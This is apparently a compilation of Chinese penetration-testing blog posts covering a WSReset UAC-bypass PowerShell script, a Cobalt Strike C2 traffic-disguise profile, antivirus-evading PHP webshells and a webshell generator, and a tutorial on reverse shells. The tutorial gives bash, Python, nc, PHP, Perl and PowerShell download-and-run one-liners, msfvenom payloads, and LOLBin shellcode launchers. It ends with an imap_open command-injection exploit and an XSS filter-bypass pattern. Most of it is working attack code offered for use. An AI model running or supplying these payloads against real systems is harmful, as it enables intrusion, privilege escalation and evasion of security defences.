环境

win10 1909 18363.535 Pro

复现

利用微软提供的sigcheck.exe签名检查工具发现 C:\Windows\System32\WSReset.exe 存在autoElevate属性为true

使用Procmon64.exe添加过滤条件

没找到 HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command

根据微软文档可知用户特定的设置优先于默认设置，而当前用户可以写入这个值，那么可以使用powershell来实现poc。

<#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API

Author: Hashim Jawad of ACTIVELabs

.PARAMETER Command
Specifies the command you would like to run in high integrity context.

.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"

This will effectivly start cmd.exe in high integrity context.

.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#>

function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )

      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"

      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"

      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5

      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}

在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功，建议把powershell脚本去掉后面的清空注册表，避免WSReset运行时找不到注册表，不过记得手动清除。

参考

1. https://www.activecyber.us/activelabs/windows-uac-bypass
2. https://github.com/sailay1996/UAC_Bypass_In_The_Wild

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

配置示例

一个简单的 HTTP Malleable C2 Profile.

set sample_name "my";
set sleeptime "5000";
set tcp_port "7001";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36";

http-get {

    set uri "/jquery.min.js";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
        parameter "ver" "1.2.4";

        metadata {

            base64;
            prepend "token=";
            header "Cookie";

        }

    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {

            base64;
            prepend "/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)";
            append "var nc=a.jQuery,oc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=oc),b&&a.jQuery===n&&(a.jQuery=nc),n},b||(a.jQuery=a.$=n),n});";
            print;

        }
    }
}

http-post {

    set uri "/wp-admin";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
        header "Cookie" "wordpress_test_cookie=WP+Cookie+check";

        id {

            base64;
            prepend "PHPSESSID=";
            header "Cookie";

        }

        output {

            base64;
            print;

        }
    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "text/html; charset=UTF-8";

        output {

            base64;
            print;

        }
    }
}

http-stager {

    set uri_x86 "/favicon1.ico";
    set uri_x64 "/favicon2.ico";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";

    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "image/x-icon";

        output {

            print;

        }
    }
}

下面将会基于这个配置文件依次进行讲解.

但先来看看这个配置文件做了什么. 以 http-get 为例, 该代码块仅对通信过程中的 GET 请求有效.

http-get {

    set uri "/jquery.min.js";

    client {

        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
        parameter "ver" "1.2.4";

        metadata {

            base64;
            prepend "token=";
            header "Cookie";

        }

    }

    server {

        header "Server" "Apache/2.4.39 (Unix)";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {

            base64;
            prepend "/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)";
            append "var nc=a.jQuery,oc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=oc),b&&a.jQuery===n&&(a.jQuery=nc),n},b||(a.jQuery=a.$=n),n});"
            print;

        }
    }
}

http-get 中分为 client 和 server 两大块, 分别针对 Beacon 发送的请求和 C2 响应的内容进行修改.

首先我们指定了参数 uri 为 /jquery.min.js, 表示通信时请求的 URL 地址.

在 client 块里, 我们在请求头中添加了 Accept-Language 字段, 对要发送的 Metadata 进行 base64 编码并拼接字符串, 然后将数据存放在 HTTP 头中, 其内容为 Cookie: token=BASE64_ENCODED_DATA , 最终发送至 C2.

在 server 块里, 我们在响应头中添加了 Server 和 Content-Type 字段, 在响应内容的前后加上 jQuery 代码, 最后进行 base64 编码并响应在 HTTP Body 里.

通信过程

在此之前. 我觉得有必要了解一下 Beacon 与 C2 的通信过程.

当 Beacon 被执行后, 会在 C2 上下载载荷执行, 即 Stage 过程, Stageless 则省去了这一步.

之后, Beacon 根据设置的睡眠时间进入睡眠状态, 结束后向 C2 发送有关 Beacon 的信息如系统类型, 版本, 当前用户, 称之为 Metadata.

如果存在待执行的任务, C2 就会响应发送 Metadata 的请求, Beacon 将会收到有关 Task 的具体内容和唯一的 Task ID, 并依次执行任务.

执行完毕后, Beacon 将各 Task 回显的数据与对应的 Task ID 依次上传至 C2, 然后再次进入睡眠状态.

其中 Beacon 发送 Metadata 时一般使用 GET, 上传回显数据时使用 POST.

代码结构

我们对于流量特征的修改都是在指定的代码块中进行的, 以下是上文中的代码块.

http-get {

    client {

        metadata {

        }

    }

    server {

        output {

        }
    }
}


http-post {

    client {

        id {

        }

        output {

        }
    }

    server {

        output {

        }
    }
}


http-stager {

    client {

    }

    server {

        output {

        }
    }
}

可以看到, 代码块按 HTTP 请求分为 http-get http-post 两种, 以及被单独列出来的 http-stager 用于 stage 过程.

按照对象分为 client 和 server, 按照不同的通信步骤分为 metadata id 和 output.

这里 client 和 server 恰好都有 output 块, 可能会有点不理解. 简要说明一下, Beacon 在上传 Task 数据时是需要对应的 Task ID 的, id 块正好是针对 Task ID 的修改, output 块则是修改通过 POST 发送的数据, 而 server 中的 output 块仅仅是用于修改响应内容的, 不要弄混了.

语句与参数

自定义参数

在之前的代码中, 我们在开头指定了一些自定义参数.

set sample_name "my";
set sleeptime "5000";
set tcp_port "7001";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36";

这些是作用于全局的参数, 统一的语法为 set key "value" 且后面需要加上分号, 字符串仅能使用双引号表示.

另外可以通过反斜杠来表示特殊字符, 例如 n, r, t, ", \, Unicode 字符 u123 和Hex 字符 x123.

参数很简单, 就不再细说了. 需要注意的是 tcp_port. 还记得之前的 Bind TCP Beacon 吗? 通过 tcp_port 我们就能够更改目标 Beacon 监听的端口.

而对于这些参数.

set uri "/jquery.min.js";
set uri_x86 "/favicon1.ico";
set uri_x64 "/favicon2.ico";

则只能放在 http-get http-post 和 http-stager 中.

其中 uri 可在 http-get http-post 中指定, 表示通信时请求的 URL, 例如 /wp-admin.

uri_x86 和 uri_x64 是指在不同位数的系统上 stage 过程中所请求的 URL, 两者不能重复. 个人建议在写的的时候也尽量使用二进制文件的路径, 例如 JPG PNG GIF.

语句

在 Malleable C2 中, 语句可分为数据转换语句, 终止语句, 额外语句 (Header and Parameter) 三种类型.

数据转换语句有 base64 base64url mask netbios netbiosu prepend append.

终止语句有 print uri-append header parameter.

额外语句有 header parameter.

输出位置

首先来讲一下终止语句, 也就是指定传输数据的存放位置. Malleable C2 提供了 4 种方法: print uri-append header parameter, 分别为存放在 HTTP Body, URL, HTTP 头和 GET 参数中.

终止语句只能写进 metadata id output 块, 不能直接放在 client 和 server 里, 而且终止语句的后面不能有其它语句, 也就是说只能放在代码块末尾.

其中 print 和 uri-append 无须指定参数, 后两者的格式为 header "Cookie" 和 parameter "action", 即存放位置为 Cookie 字段和 action 参数. 四种方法中只有 print 能够存放长数据.

举个例子.

metadata {

    base64;
    prepend "token=";
    header "Cookie";

}

上面我们将数据进行 base64 编码, 并在其前面添加 token=, 最后存放在 HTTP 头的 Cookie 字段中, 最后的效果为 Cookie: token=BASE64_ENC_DATA.

编码与加密

还是上面的代码.

metadata {

    base64;
    prepend "token=";
    header "Cookie";

}

这里的 base64 叫作数据转换语句, 只能写进 metadata id output 块中. 所有的数据转换语句都不需要传参, 但都不能放在 http-stager 块中 (因为那么点 Payload 长度没空间给你写解码函数).

另外还有 base64url mask netbios netbiosu. base64url 编码后的数据是可以放在 URL 中的, mask 为异或加密, 至于 netbios netbiosu 则是在 SMB 传输过程中针对主机名的编码方式.

最后说一个需要注意的点.

metadata {

    prepend "token=";
    base64;
    header "Cookie";

}

以这种顺序编码的话, 它就会将 token= 字符串与数据一起编码, HTTP 字段就会变成 Cookie: BASE64_ENC_DATA.

伪造与混淆

prepend 和 append 混用.

output {

    base64;
    prepend "/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)";
    append "var nc=a.jQuery,oc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=oc),b&&a.jQuery===n&&(a.jQuery=nc),n},b||(a.jQuery=a.$=n),n});"
    print;

}

我们通过 base64 加密数据, 并在其前后添加 jQuery 代码, 最终通过 HTTP Body 输出.

其中的 prepend 和 append 是可以放进 http-stager 块的, 两者合理搭配的话能够达到隐蔽的效果. 例如分别插入图片开头和末尾的 blob, 把数据留给中间.

不过除了 prepend append 就没有别的混淆办法了吗? 答案是有的.

client {

    set uri "/jQuery.min.js"
    header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8";
    parameter "ver" "1.2.4";

}

上述代码通过 header 和 parameter 添加用于混淆的 HTTP 头和 GET 参数, 格式为 header "key" "value" 和 parameter "key "value", 最终的效果是请求了 /jQuery.min.js?ver=1.2.4 这个地址.

注意这里的 header 和 parameter 我称之为额外语句, 与终止语句的不同在于它们的位置不一样. 额外语句只能写进 client 和 server 块, 而不是 metadata id 和 output 块.

调试运行

Cobalt Strike 默认给我们了 c2lint 用于检查配置文件的语法错误, 同时还能够预览配置后的 HTTP 请求与响应.

通过 teamserver 命令的第三个参数指定配置文件.

一些话

Github 上的 Malleable C2 Profile.

rsmudge/Malleable-C2-Profiles

threatexpress/malleable-c2

这篇文章也只是给 Malleable C2 开了个头, 并没有涉及到什么太过深入的东西. 例如如何自定义命名管道, DNS 传输, 添加证书, 签名等.

加油吧 🙂

2019-08-12

2019-08-09

疯狂免杀

2019-08-07

<?php
function a()
{
    return '' + @$_POST['a'];
}

eval(a());

再来一个三元表达式的

2019-08-06

常量过D盾

https://secquan.org/Notes/1069997

<?php
sprintf("123");
sprintf("123");
sprintf("123");
$a=$_GET['a'];
define("Test", "$a",true);
assert(TesT);
?>

另一种思路反序列化过D盾，代码自己写

再一种思路 创建对象重复定义变量成员过D盾

2019-05-30

ASCII码显示不出来的字符做变量过D盾

https://github.com/th1k404/unishell

http://ascii.911cha.com/

<?php
if($_GET['␄']){
    $␄=$_GET['␄'];
    @preg_replace("/abcde/e",$␄, "abcdefg");
}
?>

可以自己修改

2019-05-21

https://github.com/yzddmr6/webshell-venom

利用随机异或无限免杀d盾

蚁剑插件版请移步:

https://github.com/yzddmr6/as_webshell_venom

<?php
//code by Mr6
error_reporting(0);
    function randomkeys($length)   
{   
   $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
}   
    function randname($length)   
{   
   $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
} 
    $str=randomkeys(6); 
    $bname=randname(4);
    $lname=strrev(strtolower($bname));
    $str2="assert";
            echo "<?php n";
            echo "header('HTTP/1.1 404');n";
            echo "class  ".$bname."{ public $c='';nfunction __destruct(){n";
    for ($i=0;$i<6;$i++)
    {
        $name="_".$i;
        $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
        echo "$"."$name=";
    echo "'".$str[$i]."'"."^".""\x".$str3[$i]."";n";
    }
    $aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
    echo $aa;
    echo "n";
    echo '@$db ("$this->c");}}';
    echo "n";
    echo "${$lname}=new {$bname}();n";
    echo "@${$lname}->c=$_POST['Mr6'];n";
    echo "?>n";
    @$file=$_GET['file'];
    $html = ob_get_contents();
    if (isset($file)){
    if(file_put_contents($file,$html))
    echo "nnn".$file."   save success!";}
    else {echo "Please input the file name like '?file=xxx.txt'";}
    ?>

2019-05-11

<?php
function a(){
    return $a=$_POST['1'];
}
@assert(a());
?>

<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
    assert($value);
}

<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");

for ($x=0; $x<=0; $x++) {
    assert("$x");
}

可以发现的规律是当已经定义的变量和循环的变量名一致时，D盾就不是那么敏感了

@X1r0z的鬼点子 https://exp10it.cn/msf-execute-from-memory.html

具体原理和进程注入类似, 先创建一个正常的进程, 然后把这个进程里的内存空间覆盖成我们想要执行的程序.

Meterpreter 方式.

execute -H -m -d notepad.exe -f mimikatz.exe -i
-H 隐藏窗口.

-m 在内存中执行.

-d 指定覆盖进程 (dummy).

-f 指定执行程序 (本地文件).

-i 与该程序交互 (可选).

-a 传递参数 (可选).

在实际测试中能够绕过 360 的检测, 当然前提是你反弹会话的 payload 是免杀的.

文章首发先知，欢迎移步 https://xz.aliyun.com/t/5768

在我们渗透测试的过程中，最常用的就是基于tcp/udp协议反弹一个shell，也就是反向连接。

我们先来讲一下什么是正向连接和反向连接。

• 正向连接：我们本机去连接目标机器，比如ssh和mstsc
• 反向连接：目标机器去连接我们本机

那么为什么反向连接会比较常用呢

1. 目标机器处在局域网内，我们正向连不上他
2. 目标机器是动态ip
3. 目标机器存在防火墙

然后说一下我的实验环境

虚拟机采用nat模式

攻击机：Kali Linux ：172.16.1.130

受害机：Centos 7 ：172.16.1.134

常见姿势

bash

bash也是最常见的一种方式

Kali监听

nc -lvvp 4444

centos运行

bash -i >& /dev/tcp/172.16.1.130/4444 0>&1

当然你还可以这样

exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5|while read line;do $line >&5 2>&1;done

这两个都是bash根据Linux万物皆文件的思想衍生过来的，具体更多bash的玩法你可以参考

https://xz.aliyun.com/t/2549

python

攻击机Kali还是监听

nc -lvvp 4444

centos执行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

这个payload是反向连接并且只支持Linux，Windows可以参考离别歌师傅的 python windows正向连接后门

nc

如果目标机器上有nc并且存在-e参数，那么可以建立一个反向shell

攻击机监听

nc -lvvp 4444

目标机器执行

nc 172.16.1.130 4444 -t -e /bin/bash

这样会把目标机的/bin/bash反弹给攻击机

但是很多Linux的nc很多都是阉割版的，如果目标机器没有nc或者没有-e选项的话，不建议使用nc的方式

php

攻击机监听

nc -lvvp 4444

要求目标机器有php然后执行

php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

或者你直接在web目录写入一个php文件，然后浏览器去访问他就行了，这有一个Linux和Windows两用的脚本

Java 脚本反弹

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

perl 脚本反弹

perl -e 'use Socket;$i="172.16.1.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

powershell

目标机器执行

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444

msfvenom 获取反弹一句话

msf支持多种反弹方式，比如exe ps php asp aspx甚至是ruby等，我们可以用msfvenom来生成payload，然后在msf中监听，执行之后就会反弹回来session

生成payload的方法参考生成msf常用payload，不再赘述

然后msf监听

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.1.130
set LPORT 4444
set ExitOnSession false
exploit -j -z

那么讲到这里我们把一句话反弹shell的方式讲的差不多了，但是到这里我们又涉及到了一个免杀的问题。

我们首先需要知道的是目前的反病毒软件查杀，常见的有三种：

1. 基于文件特征
2. 基于文件行为
3. 基于云查杀 实际也是基于特征数据库的查杀

到目前为止，我所知道的免杀姿势有以下几种

1. Windows白名单 俗称白加黑 也就是用带有微软签名的软件来运行我们自己的shellcode
2. payload分离免杀 比如shellcode loader
3. 换一门偏僻的语言来自己写反弹shell

而接下来的几种只适用于Windows。

攻击机：Kali Linux ：172.16.1.130

受害机：Win 7 ：172.16.1.135

Windows白加黑

白加黑需要的payload可以使用一句话下载姿势总结 把payload下载到目标机器，这里不再赘述。

MSBuild

MSBuild是Microsoft Build Engine的缩写，代表Microsoft和Visual Studio的新的生成平台

MSBuild可在未安装Visual Studio的环境中编译.net的工程文件

MSBuild可编译特定格式的xml文件

更多基本知识可参照以下链接：

https://msdn.microsoft.com/en-us/library/dd393574.aspx

意思就是msbuild可以编译执行csharp代码。

在这里我们需要知道的是msbuild的路径

加载32位的shellcode需要用32位的msbuild

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

加载64位的shellcode需要用64位的msbuild

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

我们这里用64位的shellcode和64位的win7来操作。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp

生成shellcode之后我们需要用到一个三好学生师傅的https://github.com/3gstudent/msbuild-inline-task

我们用的是executes x64 shellcode.xml的模板，把里面45行之后的改为自己的shellcode

然后msf监听

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.1.130
set LPORT 4444
set ExitOnSession false
set autorunscript migrate -n explorer.exe
exploit -j

在目标机器上运行

C:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe "C:\Users\jack.0DAY\Desktop\exec.xml"

然后会话上线，某数字卫士无反应，并且正常执行命令

更多关于msbuild的内容可以参考三好学生师傅的文章

Installutil.exe&csc.exe

Installer工具是一个命令行实用程序，允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。

具体参考：Windows Installer部署

通过msfvenom生成C＃的shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp

下载InstallUtil-Shellcode.cs，将上面生成的shellcode复制到该cs文件中

https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260

csc编译InstallUtil-ShellCode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs

编译生成的文件后缀名无所谓exe dll txt都可以，但只能InstallUtil.exe来触发

InstallUtil.exe执行 反弹shell

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U D:\test\InstallUtil-shell.exe

参考https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/

regasm和regsvcs

regasm和regsvcs都可以用来反弹shell的，而且方式也一样

下载这个cs文件 ，然后替换你的shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp

使用sn.exe生成公钥和私钥，如果没有sn命令你可能需要安装vs

sn -k key.snk

编译dll，注意文件的路径

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs

用这两者上线

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 1.dll 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe 1.dll

或者这样

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U 1.dll 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 1.dll

上线成功。

mshta

mshta是在环境变量里的

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 ‐f raw > shellcode.bin

cat shellcode.bin |base64 ‐w 0

然后替换这个文件中的shellcode

https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta

替换' ---------- DO NOT EDIT BELOW HERE -----------上面引号包起来的base64，可以将hta托管出来。

mshta.exe http://baidu.com/shellcode.hta

在cobalt strike中mshta也是一个很方便的上线功能。

Msiexec简介：

Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包（MSI）,一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现，占用内存比较大。并且集成于 Windows 2003，Windows 7 等。

Msiexec已经被添加到环境变量了。

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 ‐f msi > shellcode.txt

目标机执行

msiexec.exe /q /i http://172.16.1.130/shellcode.txt

wmic

已经被添加到环境变量

poc

wmic os get /FORMAT:"http://example.com/evil.xsl"

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]> </ms:script>
</stylesheet>

参考:利用wmic调用xsl文件的分析与利用
这里还有一个poc https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl

rundll32

Rundll32.exe是指“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。已经加入环境变量。

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

也可以去执行msf生成的dll

rundll32.exe shell32.dll,Control_RunDLL c:\Users\Y4er\Desktop\1.dll

在这我们先简单介绍这几种，还有compiler.exe odbcconf psexec ftp.exe等等。在这里给出参考连接

micro8前辈 https://micro8.gitbook.io/micro8/contents-1#71-80-ke

payload分离免杀

在这里也只介绍两种分离免杀的姿势

shellcode loader

借助第三方加载器，将shellcode加载到内存中来执行。

https://github.com/clinicallyinane/shellcode_launcher

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c

靶机执行

shellcode_launcher.exe -i test.c

msf监听正常上线

csc和InstallUtil

不再赘述，参考上文白加黑

偏僻语言

实际上也不能说偏僻语言，原理是让杀软不识别文件的pe头。我们在这说两种

pyinstaller

py版的shellcode模板

#! /usr/bin/env python
# encoding:utf-8

import ctypes

def execute():
    # Bind shell
    shellcode = bytearray(
    "\xbe\x24\x6e\x0c\x71\xda\xc8\xd9\x74\x24\xf4\x5b\x29"
        ...
    "\x37\xa5\x48\xea\x47\xf6\x81\x90\x07\xc6\x62\x9a\x56"
    "\x13"
     )

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),
    ctypes.c_int(-1))
if __name__ == "__main__":
    execute()

msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=172.16.1.130 -e x86/shikata_ga_nai -i 5 -f py -o  1.py

使用pyinstaller打包

pyinstaller.py -F --console 1.py

和pyinstaller类似的还有py2exe，不再赘述。

go+upx

package main

import "C"
import "unsafe"

func main() {
    buf := ""
    buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
    ...省略...
    buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
    // at your call site, you can send the shellcode directly to the C
    // function by converting it to a pointer of the correct type.
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}

如果正常编译体积会很大，建议使用go build -ldflags="-s -w"参数来编译生成exe，你也可以go build -ldflags="-H windowsgui -s -w"去掉命令窗口

编译出来900多kb，在使用upx压缩一下会降低到200kb左右，也能正常上线。

写在文后

本文所讲到的很多姿势实际上是用来bypass applocker，不过也能弹回来会话。

实战环境复杂，更多情况下请自行判断该使用什么姿势，实际上有时候你折腾半天不上线还不如直接一个bash反弹回来方便。

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

Ator是一个后门生成器实用程序，它使用加密和注入技术来绕过AV检测。进一步来说：

• 它使用AES加密来加密给定的shellcode
• 生成包含加密有效负载的可执行文件
• 使用各种注入技术将shellcode解密并注入目标系统

[ 进程注入 ]：

1. 便携式可执行注入，包括将恶意代码直接写入进程（没有磁盘上的文件），然后使用其他代码或通过创建远程线程调用执行。注入代码的位移引入了重新映射内存引用的功能的附加要求。这种方法的变化，例如反射DLL注入（将自映射DLL写入进程）和内存模块（写入进程时映射DLL）克服了地址重定位问题。
2. 线程执行劫持涉及将恶意代码或DLL的路径注入进程的线程。与Process Hollowing类似，必须首先暂停该线程。

用法

该应用程序有一个由三个主要输入组成的表单（见下面的截图）：

1. 包含用于加密shellcode的加密密钥的文本
2. 包含用于AES加密的IV的文本
3. 包含shellcode的文本

重要提示：shellcode应作为C＃字节数组提供。

默认值包含执行notepad.exe（32位）的shellcode。提供此演示作为代码应如何形成的指示（使用msfvenom，可以使用-f csharp开关轻松完成，例如msfvenom -p windows / meterpreter / reverse_tcp LHOST = XXXX LPORT = XXXX -f csharp）。

在填充提供的输入并选择输出路径之后，根据所选择的选项生成可执行文件。

RTLO选项

简单来说，欺骗可执行文件看起来像“无辜”扩展，如’pdf’，’txt’等。例如文件“testcod.exe”将被解释为“tesexe.doc”

请注意，某些AV会将恶搞作为恶意软件提醒自己。

设置自定义图标

我想你们都知道它是什么:)

在Win 10 x64主机上绕过卡巴斯基AV（TEST CASE）

在运行完全更新的卡巴斯基AV的Windows 10机器中获取shell

目标机器：Windows 10 x64

1. 使用msfvenom创建有效负载msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
2. 使用AVIator进行以下设置目标OS体系结构：x64

   注入技术：线程劫持（Shellcode Arch：x64，OS arch：x64）

   目标程序：资源管理器（保留默认值）

3. 在攻击者计算机上设置侦听器
4. 在受害计算机上运行生成的exe

安装

Windows：

编译项目或从以下文件夹下载allready编译的可执行文件：

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux：

根据您的Linux发行版安装Mono，下载并运行二进制文件

例如在kali：

详细内容移步https://github.com/Ch0pin/AVIator

膜拜下@yzddmr6师傅

<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

本地复现成功，debain9 php7.0环境，需要一个imap扩展

apt-get install php-imap

From:
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_ima … /master/exploit.php

https://www.t00ls.net/thread-48531-1-1.html

核心@X1r0z原创，总是有惊奇的脑回路。

ref-xss

绕过 payload 格式
<[WORD] on[EVENT]=[EVAL]>[TEXT]
在随机单词的标签内加上 on 事件, 最后在标签外加上文本.

因为 html 的松散性, 导致<sb>sb</sb> 都能被解析成标签, 并且支持触发类似于onclick onmouseover 的事件

